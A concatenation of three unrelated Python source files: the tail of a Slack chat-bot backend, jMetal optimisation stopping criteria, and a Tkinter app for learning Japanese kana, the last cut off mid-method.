# {u'thread_ts': u'1507414046.000010', u'text': u'hello!',
# u'ts': u'1507414046.000010', u'unread_count': 2,
# u'reply_count': 2, u'user': u'U5GUL9D9N', u'replies':
# [{u'user': u'U5ACF70RH', u'ts': u'1507601449.000007'}, {
# u'user': u'U5ACF70RH', u'ts': u'1507601477.000063'}],
# u'type': u'message', u'bot_id': u'B5HL9ABFE'},
# u'type': u'message', u'hidden': True, u'channel': u'D5HGP0YE7'}
if event.get("subtype") == "bot_message":
bot = self.get_bot(event["bot_id"])
sender = Person(
id=event["bot_id"],
mention_handle="<@%s>" % event["bot_id"],
name=bot['name'],
handle=bot['name'],
source=event
)
event["text"] = event["attachments"][0]["fallback"]
else:
sender = self.people[event["user"]]
channel = clean_for_pickling(self.channels[event["channel"]])
# print "channel: %s" % channel
interpolated_handle = "<@%s>" % self.me.id
real_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
is_private_chat = False
thread = None
if "thread_ts" in event:
thread = event["thread_ts"]
            # If the parent thread is a 1-1 between Will and me, also treat that as direct.
# Since members[] still comes in on the thread event, we can trust this, even if we're
# in a thread.
if channel.id == channel.name:
is_private_chat = True
# <@U5GUL9D9N> hi
# TODO: if there's a thread with just will and I on it, treat that as direct.
is_direct = False
if is_private_chat or event["text"].startswith(interpolated_handle) or event["text"].startswith(real_handle):
is_direct = True
if event["text"].startswith(interpolated_handle):
event["text"] = event["text"][len(interpolated_handle):].strip()
if event["text"].startswith(real_handle):
event["text"] = event["text"][len(real_handle):].strip()
if interpolated_handle in event["text"] or real_handle in event["text"]:
will_is_mentioned = True
if event.get("user") == self.me.id:
will_said_it = True
m = Message(
content=event["text"],
type=event["type"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
thread=thread,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
return m
else:
            # An event type the slack backend has no idea how to handle.
pass
def set_topic(self, event):
headers = {'Accept': 'text/plain'}
data = self.set_data_channel_and_thread(event)
data.update({
"token": settings.SLACK_API_TOKEN,
"as_user": True,
"topic": event.content,
})
if data["channel"].startswith("G"):
url = SLACK_PRIVATE_SET_TOPIC_URL
else:
url = SLACK_SET_TOPIC_URL
r = requests.post(
url,
headers=headers,
data=data,
**settings.REQUESTS_OPTIONS
)
self.handle_request(r, data)
def handle_outgoing_event(self, event):
if event.type in ["say", "reply"]:
if "kwargs" in event and "html" in event.kwargs and event.kwargs["html"]:
event.content = SlackMarkdownConverter().convert(event.content)
                event.content = event.content.replace("&amp;", "&")
                event.content = event.content.replace("\_", "_")
kwargs = {}
if "kwargs" in event:
kwargs.update(**event.kwargs)
if hasattr(event, "source_message") and event.source_message and "channel" not in kwargs:
self.send_message(event)
else:
# Came from webhook/etc
# TODO: finish this.
target_channel = kwargs.get("room", kwargs.get("channel", None))
if target_channel:
event.channel = self.get_channel_from_name(target_channel)
if event.channel:
self.send_message(event)
else:
logging.error(
"I was asked to post to the slack %s channel, but it doesn't exist.",
target_channel
)
if self.default_channel:
event.channel = self.get_channel_from_name(self.default_channel)
event.content = event.content + " (for #%s)" % target_channel
self.send_message(event)
elif self.default_channel:
event.channel = self.get_channel_from_name(self.default_channel)
self.send_message(event)
else:
logging.critical(
"I was asked to post to a slack default channel, but I'm nowhere."
"Please invite me somewhere with '/invite @%s'", self.me.handle
)
if event.type in ["topic_change", ]:
self.set_topic(event)
elif (
event.type == "message.no_response" and
event.data.is_direct and
event.data.will_said_it is False
):
event.content = random.choice(UNSURE_REPLIES)
self.send_message(event)
def handle_request(self, r, data):
resp_json = r.json()
if not resp_json["ok"]:
if resp_json["error"] == "not_in_channel":
channel = self.get_channel_from_name(data["channel"])
if not hasattr(self, "me") or not hasattr(self.me, "handle"):
self.people
logging.critical(
"I was asked to post to the slack %s channel, but I haven't been invited. "
"Please invite me with '/invite @%s'" % (channel.name, self.me.handle)
)
else:
logging.error("Error sending to slack: %s" % resp_json["error"])
logging.error(resp_json)
assert resp_json["ok"]
    def set_data_channel_and_thread(self, event, data=None):
        # Use a fresh dict per call rather than a shared mutable default argument.
        if data is None:
            data = {}
if "channel" in event:
# We're coming off an explicit set.
channel_id = event.channel.id
else:
if "source_message" in event:
# Mentions that come back via self.say()
if hasattr(event.source_message, "data"):
channel_id = event.source_message.data.channel.id
if hasattr(event.source_message.data, "thread"):
data.update({
"thread_ts": event.source_message.data.thread
})
else:
# Mentions that come back via self.say() with a specific room (I think)
channel_id = event.source_message.channel.id
if hasattr(event.source_message, "thread"):
data.update({
"thread_ts": event.source_message.thread
})
else:
# Mentions that come back via self.reply()
if hasattr(event.data, "original_incoming_event"):
if hasattr(event.data.original_incoming_event.channel, "id"):
channel_id = event.data.original_incoming_event.channel.id
else:
channel_id = event.data.original_incoming_event.channel
else:
if hasattr(event.data["original_incoming_event"].data.channel, "id"):
channel_id = event.data["original_incoming_event"].data.channel.id
else:
channel_id = event.data["original_incoming_event"].data.channel
try:
# If we're starting a thread
if "kwargs" in event and "start_thread" in event.kwargs and event.kwargs["start_thread"] and ("thread_ts" not in data or not data["thread_ts"]):
if hasattr(event.source_message, "original_incoming_event"):
data.update({
"thread_ts": event.source_message.original_incoming_event["ts"]
})
elif (
hasattr(event.source_message, "data") and
hasattr(event.source_message.data, "original_incoming_event") and
"ts" in event.source_message.data.original_incoming_event
):
logging.error(
"Hm. I was told to start a new thread, but while using .say(), instead of .reply().\n"
"This doesn't really make sense, but I'm going to make the best of it by pretending you "
"used .say() and threading off of your message.\n"
"Please update your plugin to use .reply() when you have a second!"
)
data.update({
"thread_ts": event.source_message.data.original_incoming_event["ts"]
})
else:
if hasattr(event.data.original_incoming_event, "thread_ts"):
data.update({
"thread_ts": event.data.original_incoming_event.thread_ts
})
elif "thread" in event.data.original_incoming_event.data:
data.update({
"thread_ts": event.data.original_incoming_event.data.thread
})
except:
logging.info(traceback.format_exc().split(" ")[-1])
pass
data.update({
"channel": channel_id,
})
return data
def send_message(self, event):
data = {}
if hasattr(event, "kwargs"):
data.update(event.kwargs)
# Add slack-specific functionality
if "color" in event.kwargs:
data.update({
"attachments": json.dumps([
{
"fallback": event.content,
"color": self._map_color(event.kwargs["color"]),
"text": event.content,
}
]),
})
elif "attachments" in event.kwargs:
data.update({
"text": event.content,
"attachments": json.dumps(event.kwargs["attachments"])
})
else:
data.update({
"text": event.content,
})
else:
data.update({
"text": event.content,
})
data = self.set_data_channel_and_thread(event, data=data)
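        # (Sketch with a hypothetical user ID: an HTML-escaped mention such as
        # "&lt;@U123&gt; hi" in the outgoing text is presumably turned back
        # into "<@U123> hi" below so Slack auto-links it.)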
# Auto-link mention names
if "text" in data:
if data["text"].find("<@") != -1:
data["text"] = data["text"].replace("<@", "<@")
data["text"] = data["text"].replace(">", ">")
elif "attachments" in data and "text" in data["attachments"][0]:
if data["attachments"][0]["text"].find("<@") != -1:
data["attachments"][0]["text"] = data["attachments"][0]["text"].replace("<@", "<@")
data["attachments"][0]["text"] = data["attachments"][0]["text"].replace(">", ">")
data.update({
"token": settings.SLACK_API_TOKEN,
"as_user": True,
})
if hasattr(event, "kwargs") and "html" in event.kwargs and event.kwargs["html"]:
data.update({
"parse": "full",
})
headers = {'Accept': 'text/plain'}
r = requests.post(
SLACK_SEND_URL,
headers=headers,
data=data,
**settings.REQUESTS_OPTIONS
)
self.handle_request(r, data)
def _map_color(self, color):
# Turn colors into hex values, handling old slack colors, etc
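        # e.g. "red" -> "danger", "green" -> "good"; anything else (such as a
        # hex string like "#36a64f") is passed through unchanged.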
if color == "red":
return "danger"
elif color == "yellow":
return "warning"
elif color == "green":
return "good"
return color
def join_channel(self, channel_id):
return self.client.api_call(
"channels.join",
channel=channel_id,
)
def get_bot(self, bot_id):
# Uses the bots.info Slack method to retrieve info on a bot by ID,
# and saves it locally on self._bots. If the bot is already saved,
# we return the saved copy.
bot = None
if not hasattr(self, '_bots'):
self._bots = {}
if bot_id in self._bots:
bot = self._bots[bot_id]
else:
bot_api_data = self.client.api_call("bots.info", bot=bot_id)
if bot_api_data['ok']:
self._bots[bot_id] = {
'name': bot_api_data['bot']['name'],
'app_id': bot_api_data['bot']['app_id'],
'id': bot_api_data['bot']['id']
}
bot = self._bots[bot_id]
else:
logging.error("Failed to find bot with id: {0}".format(bot_id))
return bot
@property
def people(self):
if not hasattr(self, "_people") or self._people is {}:
self._update_people()
return self._people
@property
def default_channel(self):
if not hasattr(self, "_default_channel") or not self._default_channel:
self._decide_default_channel()
return self._default_channel
@property
def channels(self):
if not hasattr(self, "_channels") or self._channels is {}:
self._update_channels()
return self._channels
@property
def client(self):
if not hasattr(self, "_client"):
self._client = SlackClient(settings.SLACK_API_TOKEN)
return self._client
def _decide_default_channel(self):
self._default_channel = None
if not hasattr(self, "complained_about_default"):
self.complained_about_default = False
self.complained_uninvited = False
# Set self.me
self.people
if hasattr(settings, "SLACK_DEFAULT_CHANNEL"):
channel = self.get_channel_from_name(settings.SLACK_DEFAULT_CHANNEL)
if channel:
if self.me.id in channel.members:
self._default_channel = channel.id
return
elif not self.complained_about_default:
self.complained_about_default = True
logging.error("The defined default channel(%s) does not exist!",
settings.SLACK_DEFAULT_CHANNEL)
for c in self.channels.values():
if c.name != c.id and self.me.id in c.members:
self._default_channel = c.id
if not self._default_channel and not self.complained_uninvited:
self.complained_uninvited = True
logging.critical("No channels with me invited! No messages will be sent!")
def _update_channels(self):
channels = {}
for c in self.client.server.channels:
members = {}
for m in c.members:
members[m] = self.people[m]
channels[c.id] = Channel(
id=c.id,
name=c.name,
source=clean_for_pickling(c),
members=members
)
if len(channels.keys()) == 0:
            # Server isn't set up yet (we're likely in a processing thread),
            # so fall back to the cached copy if we have one.
if self.load("slack_channel_cache", None):
self._channels = self.load("slack_channel_cache", None)
else:
self._channels = channels
self.save("slack_channel_cache", channels)
def _update_people(self):
people = {}
self.handle = self.client.server.username
for k, v in self.client.server.users.items():
user_timezone = None
if v.tz:
user_timezone = v.tz
people[k] = Person(
id=v.id,
mention_handle="<@%s>" % v.id,
handle=v.name,
source=clean_for_pickling(v),
name=v.real_name,
)
if v.name == self.handle:
self.me = Person(
id=v.id,
mention_handle="<@%s>" % v.id,
handle=v.name,
source=clean_for_pickling(v),
name=v.real_name,
)
if user_timezone and user_timezone != 'unknown':
people[k].timezone = user_timezone
if v.name == self.handle:
self.me.timezone = user_timezone
if len(people.keys()) == 0:
            # Server isn't set up yet (we're likely in a processing thread),
            # so fall back to the cached copy if we have one.
if self.load("slack_people_cache", None):
self._people = self.load("slack_people_cache", None)
if not hasattr(self, "me") or not self.me:
self.me = self.load("slack_me_cache", None)
if not hasattr(self, "handle") or not self.handle:
self.handle = self.load("slack_handle_cache", None)
else:
self._people = people
self.save("slack_people_cache", people)
self.save("slack_me_cache", self.me)
self.save("slack_handle_cache", self.handle)
def _update_backend_metadata(self):
self._update_people()
self._update_channels()
def _watch_slack_rtm(self):
while True:
try:
if self.client.rtm_connect(auto_reconnect=True):
self._update_backend_metadata()
num_polls_between_updates = 30 / settings.EVENT_LOOP_INTERVAL # Every 30 seconds
current_poll_count = 0
while True:
events = self.client.rtm_read()
if len(events) > 0:
# TODO: only handle events that are new.
# print(len(events))
for e in events:
self.handle_incoming_event(e)
                        # Update channels/people/me/etc every 30s or so.
current_poll_count += 1
if current_poll_count > num_polls_between_updates:
self._update_backend_metadata()
current_poll_count = 0
self.sleep_for_event_loop()
except (WebSocketConnectionClosedException, SlackConnectionError):
                logging.error('Encountered connection error, attempting reconnect in 2 seconds')
time.sleep(2)
except (KeyboardInterrupt, SystemExit):
break
except:
logging.critical("Error in watching slack RTM: \n%s" % traceback.format_exc())
break
def bootstrap(self):
        # Bootstrap must provide a way to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
# Property, auto-inits.
self.client
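        # Despite the attribute name, the RTM watcher runs in a separate
        # process (multiprocessing.Process), not a thread.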
self.rtm_thread = Process(target=self._watch_slack_rtm)
self.rtm_thread.start()
def terminate(self):
if hasattr(self, "rtm_thread"):
self.rtm_thread.terminate()
while self.rtm_thread.is_alive():
time.sleep(0.2)
|
termination_criterion.py
|
import threading
from abc import ABC, abstractmethod
from jmetal.core.observer import Observer
from jmetal.core.quality_indicator import QualityIndicator
"""
.. module:: termination_criterion
:platform: Unix, Windows
:synopsis: Implementation of stopping conditions.
.. moduleauthor:: Antonio Benítez-Hidalgo <antonio.b@uma.es>
"""
class TerminationCriterion(Observer, ABC):
@abstractmethod
def update(self, *args, **kwargs):
pass
@property
@abstractmethod
def is_met(self):
pass
@abstractmethod
def get_criterion(self):
pass
class StoppingByEvaluations(TerminationCriterion):
def get_criterion(self):
return self.max_evaluations
def __init__(self, max: int):
super(StoppingByEvaluations, self).__init__()
self.max_evaluations = max
self.evaluations = 0
def update(self, *args, **kwargs):
self.evaluations = kwargs['EVALUATIONS']
@property
def is_met(self):
return self.evaluations >= self.max_evaluations
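# Example usage (a sketch; the uppercase keyword arguments are the ones this
# module already reads from **kwargs in update()):
#   criterion = StoppingByEvaluations(max=25000)
#   criterion.update(EVALUATIONS=evaluations_so_far)
#   if criterion.is_met:
#       ...  # stop the run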
class StoppingByTime(TerminationCriterion):
def __init__(self, max_seconds: int):
super(StoppingByTime, self).__init__()
self.max_seconds = max_seconds
self.seconds = 0.0
def update(self, *args, **kwargs):
self.seconds = kwargs['COMPUTING_TIME']
@property
def is_met(self):
return self.seconds >= self.max_seconds
def get_criterion(self):
return self.max_seconds
def key_has_been_pressed(stopping_by_keyboard):
input('PRESS ANY KEY + ENTER: ')
stopping_by_keyboard.key_pressed = True
class StoppingByKeyboard(TerminationCriterion):
def __init__(self):
super(StoppingByKeyboard, self).__init__()
self.key_pressed = False
thread = threading.Thread(target=key_has_been_pressed, args=(self,))
thread.start()
def get_criterion(self):
return None
def update(self, *args, **kwargs):
pass
@property
def is_met(self):
return self.key_pressed
class StoppingByQualityIndicator(TerminationCriterion):
def __init__(self, quality_indicator: QualityIndicator, expected_value: float, degree: float):
super(StoppingByQualityIndicator, self).__init__()
self.quality_indicator = quality_indicator
self.expected_value = expected_value
self.degree = degree
self.value = 0.0
def update(self, *args, **kwargs):
solutions = kwargs['SOLUTIONS']
if solutions:
self.value = self.quality_indicator.compute(solutions)
def get_criterion(self):
return self.expected_value
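    # For a minimization indicator with, say, expected_value=0.01 and
    # degree=0.9, is_met becomes True once value * 0.9 < 0.01; for
    # maximization the inequality is reversed.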
@property
def is_met(self):
if self.quality_indicator.is_minimization:
met = self.value * self.degree < self.expected_value
else:
met = self.value * self.degree > self.expected_value
return met
|
windows.py
|
"""
Tkinter frames that act as the app's windows.
"""
import os
from random import choice, shuffle
from threading import Thread
import tkinter as tk
from PIL import Image, ImageTk
from playsound import playsound, PlaysoundException
import kana_teacher.widgets as kw
# Path to app images and sounds.
ASSET_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "..", "assets")
FONT = ("Helvetica", 20)
SESS_SETTINGS = {
"index": 0, # Index of the kana being quizzed/learned.
"kana": None, # Kana currently being quizzed/learned.
"mode": ""} # Session mode, determines quizzing or learning.
class App(tk.Frame):
"""Object that runs the app."""
def __init__(self, root):
super().__init__(root)
self.root = root
self.bind("<Configure>", self._resize_callback)
self.root.title("Kana Learning")
self.load_frames()
self.pack(fill=tk.BOTH, expand=1)
def _resize_callback(self, event):
self.ins_label.config(wraplength=self.root.winfo_width() - 8)
def _msg_var_callback(self, *args):
self.ins_label.config(text=self.ins_var.get())
def load_frames(self):
# Args for ins_label.
self.ins_var = tk.StringVar()
self.ins_var.trace("w", self._msg_var_callback)
self.ins_label = tk.Label(
self, text="", font=FONT, textvariable=self.ins_var, bg="khaki2")
sep_frame = tk.Frame(self, height=6, bd=3, relief=tk.SUNKEN)
self.ins_label.pack(fill=tk.X, padx=4)
sep_frame.pack(fill=tk.X, padx=5)
self.windows = {
"setup": Setup(self),
"learn": Learn(self),
"speak": Speak(self),
"write": Write(self)}
self.windows["setup"].take_focus()
class Popup(tk.Toplevel):
"""Toplevel to message the user. Set timed to False to force user
to close this window before moving on.
"""
wait_time = 2000
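    # Tk's after() takes milliseconds, so timed popups close after 2 seconds.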
def __init__(self, parent, msg, timed=True, **kwargs):
super().__init__(parent)
self.title("!!!")
# Offset popup from topleft of parent slightly.
x = parent.root.winfo_x() + 5
y = parent.root.winfo_y() + 5
self.geometry(f"+{x}+{y}")
m = tk.Message(self, text=msg, aspect=300, font=FONT)
b = tk.Button(
self, text="OK", command=self.destroy, bg="palevioletred1",
font=FONT)
m.pack(fill=tk.X, expand=1)
b.pack(side=tk.BOTTOM, pady=4)
if timed:
self.after(Popup.wait_time, self.destroy)
else:
self.grab_set()
parent.wait_window()
class AppWindow(tk.Frame):
"""Base class for all the app's windows."""
instructions = ""
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
self.app = app
self.root = app.root
self.widgets = {}
self.load_widgets()
def load_widgets(self):
pass
class Setup(AppWindow):
"""Window where settings are chosen before kicking off learning or
quizzes. Settings are saved to SESS_SETTINGS.
"""
instructions = "Choose kana, and choose learning or quizzing."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _get_selected_kana(self):
"""Return a list of all kana highlighted from both charts."""
kana = []
for w in self.widgets["hira_chart"].grid_slaves():
if not isinstance(w, tk.Checkbutton):
if w.cget("bg") != "white":
kana.append((w.romaji, "hira"))
for w in self.widgets["kata_chart"].grid_slaves():
if not isinstance(w, tk.Checkbutton):
if w.cget("bg") != "white":
kana.append((w.romaji, "kata"))
shuffle(kana)
return kana
def load_widgets(self):
# Args and variables for the radio_buttons.
self.radio_var = tk.StringVar()
radio_buttons = []
modes = [
("Learn", "learn"),
("Speaking Quiz", "speak"),
("Writing Quiz", "write"),
("Both Quizzes", "both")]
self.rowconfigure(2, weight=1)
self.rowconfigure(6, weight=1)
# The charts and their checkbuttons.
kata_chart = kw.KanaChart(self, "kata")
hira_chart = kw.KanaChart(self, "hira")
self.off_chart = hira_chart
self.on_chart = kata_chart
chart_name_label = tk.Label(
self, text=self.on_chart.name, font=FONT)
select_all_button = tk.Button(
self, text="Select All", font=FONT,
command=self.select_all)
deselect_all_button = tk.Button(
self, text="Deselect All", font=FONT,
command=self.deselect_all)
switch_button = tk.Button(
self, text="Switch Kana", font=FONT,
command=self.switch_chart)
padding1 = tk.Label(self)
# The radio buttons.
for text, mode in modes:
rb = tk.Radiobutton(
self, text=text, font=FONT, var=self.radio_var, value=mode)
radio_buttons.append(rb)
padding2 = tk.Label(self)
start_button = tk.Button(
self, text="Start", font=FONT, command=self.start)
self.on_chart.grid(columnspan=5, pady=4, padx=4)
chart_name_label.grid(row=1, column=0)
select_all_button.grid(row=1, column=2)
deselect_all_button.grid(row=1, column=3)
switch_button.grid(row=1, column=4)
padding1.grid(row=2, sticky="ns")
radio_buttons[0].grid(row=4, column=1)
for i in range(len(radio_buttons[1:])):
radio_buttons[(i + 1)].grid(row=(i + 3), column=3)
padding2.grid(row=6, sticky="ns")
start_button.grid(row=7, column=4, padx=4, pady=4, sticky="e")
self.widgets["kata_chart"] = kata_chart
self.widgets["hira_chart"] = hira_chart
self.widgets["chart_name_label"] = chart_name_label
self.widgets["select_all_button"] = select_all_button
self.widgets["deselect_all_button"] = deselect_all_button
self.widgets["switch_button"] = switch_button
self.widgets["padding1"] = padding1
self.widgets["radio_buttons"] = radio_buttons
self.widgets["padding2"] = padding2
self.widgets["start_button"] = start_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget() # unpack the previous window
self.app.ins_var.set(self.instructions)
# self.deselect_all(both=True) # better to leave previous selection?
self.pack(fill=tk.BOTH, expand=1)
def select_all(self):
"""Highlight all chart cells and select all checkbuttons."""
buttons = self.on_chart.grid_slaves(row=0)
buttons.extend(self.on_chart.grid_slaves(column=0))
for b in buttons:
if b.cget("bg") == "SystemButtonFace":
b.invoke()
def deselect_all(self, both=False):
"""Unhighlight all chart cells and deselect all checkbuttons."""
buttons = self.on_chart.grid_slaves(row=0)
buttons.extend(self.on_chart.grid_slaves(column=0))
if both:
buttons.extend(self.off_chart.grid_slaves(row=0))
buttons.extend(self.off_chart.grid_slaves(column=0))
for b in buttons:
if b.cget("bg") != "SystemButtonFace":
b.invoke()
def switch_chart(self):
"""Switch between displaying the kata and hira charts."""
self.on_chart, self.off_chart = self.off_chart, self.on_chart
self.off_chart.grid_remove()
self.widgets["chart_name_label"].config(text=self.on_chart.name)
self.on_chart.grid(row=0, column=0, columnspan=5)
def start(self):
"""Get user selected settings and start quizzing/teaching."""
kana = self._get_selected_kana()
if not kana:
Popup(self, "You must select some hiragana or katakana!")
return
SESS_SETTINGS["kana"] = kana
mode = self.radio_var.get()
if not mode:
Popup(self, "You must select a mode!")
return
SESS_SETTINGS["mode"] = mode
if SESS_SETTINGS["mode"] == "both":
next_window = choice(["speak", "write"])
self.app.windows[next_window].take_focus()
else:
self.app.windows[SESS_SETTINGS["mode"]].take_focus()
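# Sketch of the session state shared by these windows, assuming SESS_SETTINGS
# is the module-level dict defined earlier in this file:
#
#     SESS_SETTINGS["kana"]  -> shuffled [(romaji, "hira" | "kata"), ...]
#     SESS_SETTINGS["mode"]  -> "learn" | "speak" | "write" | "both"
#     SESS_SETTINGS["index"] -> current position in SESS_SETTINGS["kana"]
#
# Setup.start() fills "kana" and "mode"; the Learn/Speak/Write windows reset
# or advance "index".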
class Learn(AppWindow):
"""Window that is meant to teach the kana, as opposed to quiz."""
instructions = "Practice brush strokes and speaking."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _load_next_kana(self):
"""Load the next kana's media."""
try:
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
except IndexError:
popup = Popup(
self, "You've looped through all the kana! Starting again...")
shuffle(SESS_SETTINGS["kana"])
SESS_SETTINGS["index"] = 0
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
self.widgets["stroke_gif"].destroy()
self.widgets["stroke_gif"] = kw.ImageLabel(self)
self.widgets["stroke_gif"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"))
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4)
self.widgets["char_still"].unload()
self.widgets["char_still"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"), frame=-1)
self.audio_path = os.path.join(
ASSET_PATH, "sounds", "kana", kana[0] + ".wav")
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
def _cleanup(self):
"""Prevent the gif from looping when out of sight."""
self.widgets["stroke_gif"].destroy()
def load_widgets(self):
# Variables for the audio_button.
path = os.path.join(ASSET_PATH, "images", "sound.png")
self.audio_image = ImageTk.PhotoImage(file=path)
canvas = kw.DrawingCanvas(self)
stroke_gif = kw.ImageLabel(self)
char_still = kw.ImageLabel(self)
audio_button = tk.Button(
self, image=self.audio_image, command=self.play_audio)
quit_button = tk.Button(
self, text="Quit", font=FONT, command=self.quit)
quiz_button = tk.Button(
self, text="Quiz Me!", font=FONT, command=self.quiz)
next_button = tk.Button(
self, text="Next", font=FONT, comman=self.next)
canvas.grid(columnspan=2, rowspan=2, padx=4, sticky="nsew")
stroke_gif.grid(row=0, column=2, padx=4)
char_still.grid(row=1, column=2, padx=4)
audio_button.grid(row=2, column=2, padx=4, pady=4)
quit_button.grid(row=3, column=0, padx=4, pady=4, sticky="w")
quiz_button.grid(row=3, column=1, pady=4)
next_button.grid(row=3, column=2, padx=4, pady=4, sticky="e")
self.widgets["canvas"] = canvas
self.widgets["stroke_gif"] = stroke_gif
self.widgets["char_still"] = char_still
self.widgets["audio_button"] = audio_button
self.widgets["quit_button"] = quit_button
self.widgets["quiz_button"] = quiz_button
self.widgets["next_button"] = next_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget()
self.app.ins_var.set(self.instructions)
self._load_next_kana()
self.pack(fill=tk.BOTH, expand=1)
def play_audio(self):
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
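    # Note: playsound runs in a worker thread, so a PlaysoundException for a
    # missing file is raised inside that thread rather than at t.start(); the
    # except clause above is effectively a safety net.  A minimal alternative
    # sketch, under the same playsound/ASSET_PATH assumptions:
    #
    #     def play_audio(self):
    #         if not os.path.exists(self.audio_path):
    #             print(">>> No audio for this kana")
    #             return
    #         Thread(target=playsound, args=(self.audio_path,), daemon=True).start()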
def quit(self):
self._cleanup()
self.app.windows["setup"].take_focus()
def quiz(self):
"""Change the session from learning to quizzing."""
self._cleanup()
SESS_SETTINGS["index"] = 0
SESS_SETTINGS["mode"] = "both"
next_window = choice(["speak", "write"])
self.app.windows[next_window].take_focus()
def next(self):
"""Move on to the next kana."""
self._cleanup()
SESS_SETTINGS["index"] += 1
self._load_next_kana()
class Speak(AppWindow):
"""Window that quizzes by having the user speak."""
instructions = "Say the character shown."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _load_next_kana(self):
"""Load the next kana's media."""
try:
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
except IndexError:
popup = Popup(
self, "You've looped through all the kana! Starting again...")
shuffle(SESS_SETTINGS["kana"])
SESS_SETTINGS["index"] = 0
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
self.widgets["stroke_gif"].destroy()
self.widgets["stroke_gif"] = kw.ImageLabel(self)
self.widgets["stroke_gif"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"))
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4)
self.audio_path = os.path.join(
ASSET_PATH, "sounds", "kana", kana[0] + ".wav")
def _cleanup(self):
"""Prevent the gif from looping when out of sight."""
self.widgets["stroke_gif"].destroy()
def load_widgets(self):
# Args for the audio_button.
path = os.path.join(ASSET_PATH, "images", "sound.png")
self.audio_image = ImageTk.PhotoImage(file=path)
stroke_gif = kw.ImageLabel(self)
audio_button = tk.Button(
self, image=self.audio_image, command=self.play_audio)
quit_button = tk.Button(
self, text="Quit", font=FONT, command=self.quit)
learn_button = tk.Button(
self, text="Learn", font=FONT, command=self.learn)
next_button = tk.Button(
self, text="Next", font=FONT, command=self.next)
stroke_gif.grid(columnspan=3, padx=4, pady=4)
audio_button.grid(row=0, column=0, pady=4)
quit_button.grid(row=2, column=0, padx=4, pady=4, sticky="w")
learn_button.grid(row=2, column=1, pady=4)
next_button.grid(row=2, column=2, padx=4, pady=4, sticky="e")
self.widgets["stroke_gif"] = stroke_gif
self.widgets["audio_button"] = audio_button
self.widgets["quit_button"] = quit_button
self.widgets["learn_button"] = learn_button
self.widgets["next_button"] = next_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget()
self.app.ins_var.set(self.instructions)
self._load_next_kana()
self.pack(fill=tk.BOTH, expand=1)
def play_audio(self):
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
def quit(self):
self._cleanup()
self.app.windows["setup"].take_focus()
def learn(self):
"""Switch session from quizzing to learning."""
self._cleanup()
SESS_SETTINGS["mode"] = "learn"
self.app.windows["learn"].take_focus()
def next(self):
"""Move on to the next kana."""
self._cleanup()
SESS_SETTINGS["index"] += 1
if SESS_SETTINGS["mode"] == "both":
next_window = choice(["speak", "write"])
else:
next_window = "speak"
if next_window == "speak":
self._load_next_kana()
else:
self.app.windows[next_window].take_focus()
class Write(AppWindow):
"""Window that quizzes by having the user write."""
instructions = "Write the character spoken."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _load_next_kana(self):
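        """Load the next kana's media."""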
try:
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
except IndexError:
popup = Popup(
self, "You've looped through all the kana! Starting again...")
shuffle(SESS_SETTINGS["kana"])
SESS_SETTINGS["index"] = 0
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
self.widgets["canvas"].erase()
self.widgets["stroke_gif"].destroy()
self.widgets["stroke_gif"] = kw.ImageLabel(self)
self.widgets["stroke_gif"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"))
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4)
self.widgets["char_still"].unload()
self.widgets["char_still"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"), frame=-1)
self.widgets["show_button"].grid(row=0, column=2, padx=4, pady=4)
self.widgets["stroke_gif"].grid_forget()
self.widgets["char_still"].grid_forget()
self.audio_path = os.path.join(
ASSET_PATH, "sounds", "kana", kana[0] + ".wav")
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'...".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
def _cleanup(self):
"""Prevent the gif from looping when out of sight."""
self.widgets["stroke_gif"].destroy()
def load_widgets(self):
# Args for the audio_button.
path = os.path.join(ASSET_PATH, "images", "sound.png")
self.audio_image = ImageTk.PhotoImage(file=path)
canvas = kw.DrawingCanvas(self)
show_button = tk.Button(
self, text="Show Answer", font=FONT, command=self.show)
stroke_gif = kw.ImageLabel(self)
char_still = kw.ImageLabel(self)
